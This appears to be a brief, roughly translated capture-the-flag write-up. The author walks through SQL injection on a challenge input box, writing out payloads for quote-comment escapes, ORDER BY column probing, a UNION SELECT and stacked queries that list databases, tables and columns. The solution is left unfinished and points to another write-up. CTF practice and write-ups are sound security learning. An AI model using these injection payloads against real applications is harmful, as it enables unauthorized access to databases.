Open the title and see an input box
. Enter'error report, there should be SQL injection
Use 1'# to display correctly
directly on order by
1' order by 3 #
Tests 1, 2 are normal, 3 reports an error
At this time I was naive and thought I was not far from success~~
Start a joint query
-1' union select 1,2 #
Submit
test found stack injection available
1';show databases;#
1';show tables;#
1';show columns from words;#
1';show columns from 1919810931114514;#
At this moment, the data in this table could not be found. At first, I thought it was my problem. After all, the probability of my own problem is high. After all, I tried repeatedly for a long time -_-! At this point, I understand Dishes are original sin T_T.
Finally, I went to see the wp of the boss and realized that it was not my problem,
but the final reading of the flag's Sao operation still requires a solid sql language to think of...
Reference: https://blog.csdn.net/qq_26406447/article/details/ 90643951